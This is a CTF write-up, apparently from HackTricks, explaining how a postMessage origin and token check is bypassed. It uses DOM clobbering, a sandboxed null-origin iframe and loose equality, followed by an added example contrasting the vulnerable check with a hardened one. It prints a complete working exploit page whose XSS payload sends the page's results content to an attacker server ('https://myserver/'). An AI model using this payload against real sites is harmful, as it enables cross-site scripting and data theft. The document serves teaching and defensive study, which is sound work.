Bypassing SOP with Iframes - 2

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Iframes in SOP-2

In the solution to this challenge, @Strellic_ proposes a method similar to the one in the previous section. Let's take a look.

In this challenge, the attacker needs to bypass this check:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

If they do, they can send a postMessage whose HTML content is written into the page via innerHTML without being sanitised (XSS).

The way around the first check is to make window.calc.contentWindow undefined and e.source null:

  • window.calc.contentWindow is basically document.getElementById("calc"). You can clobber document.getElementById with <img name=getElementById /> (note that the Sanitizer API used here is not configured to protect against DOM clobbering attacks in its default mode).

  • Therefore, you can clobber document.getElementById("calc") with <img name=getElementById /><div id=calc></div>. After that, window.calc will be undefined.

  • Now we need e.source to be undefined or null (because == is used instead of ===, null == undefined is true). Getting this is "easy": if you create an iframe, send a postMessage from it and immediately remove the iframe, e.origin will be null. See the following code:

let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null

To bypass the second check, the one on the token, send a token with the value null and make the value of window.token undefined:

  • Sending a token with the value null in the postMessage is easy.

  • window.token calls the getCookie function, which uses document.cookie. Note that any access to document.cookie from a null-origin page throws an error. This leaves window.token with the value undefined.

The final solution by @terjanq is the following:

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// with this null origin, any access to document.cookie throws an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr);

function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>
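As an added example, not code from the challenge or from either write-up, here is the loose check the challenge used beside a hardened version, evaluated in Node against constructed event and window objects (plain objects standing in for the real DOM). It shows why a clobbered calc element with no contentWindow plus a null-source message passes the == comparison, and what a check that resists it looks like.

```javascript
// Added example: loose (vulnerable) check vs. strict check for a postMessage handler.
// "win" is a plain object standing in for the page's window globals (constructed).

// The challenge's original check: == on both operands. With window.calc clobbered to an
// element that has no contentWindow, and window.token undefined, null == undefined is true.
function looseCheck(e, win) {
  const expectedSource = win.calc && win.calc.contentWindow;
  return e.source == expectedSource && e.data.token == win.token;
}

// Hardened check: pin the expected origin, require a real source window object,
// compare with ===, and refuse null/undefined on either side of the token comparison.
function strictCheck(e, win, expectedOrigin) {
  if (e.origin !== expectedOrigin) return false;                       // null-origin senders fail here
  if (!win.calc || typeof win.calc.contentWindow !== 'object' || win.calc.contentWindow === null) {
    return false;                                                       // clobbered or missing iframe
  }
  if (e.source === null || e.source !== win.calc.contentWindow) return false;
  if (typeof win.token !== 'string' || typeof e.data.token !== 'string') return false;
  return e.data.token === win.token;
}

// Constructed attacker state: calc is a clobbered <form>-like element without contentWindow,
// the token lookup failed (undefined), and the message arrives with a null source.
const clobberedWindow = { calc: { tagName: 'FORM' }, token: undefined };
const attackerEvent = { source: null, origin: 'null', data: { token: null, result: '<img src onerror=...>' } };

// Constructed healthy state: a real iframe window object and a matching token.
const iframeWindow = {};
const healthyWindow = { calc: { contentWindow: iframeWindow }, token: 'secret-token' };
const legitEvent = { source: iframeWindow, origin: 'https://calc.example', data: { token: 'secret-token', result: '4' } };

function demo() {
  return {
    looseAcceptsAttacker: looseCheck(attackerEvent, clobberedWindow),   // true: the bypass
    strictRejectsAttacker: !strictCheck(attackerEvent, clobberedWindow, 'https://calc.example'),
    strictAcceptsLegit: strictCheck(legitEvent, healthyWindow, 'https://calc.example'),
  };
}
```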
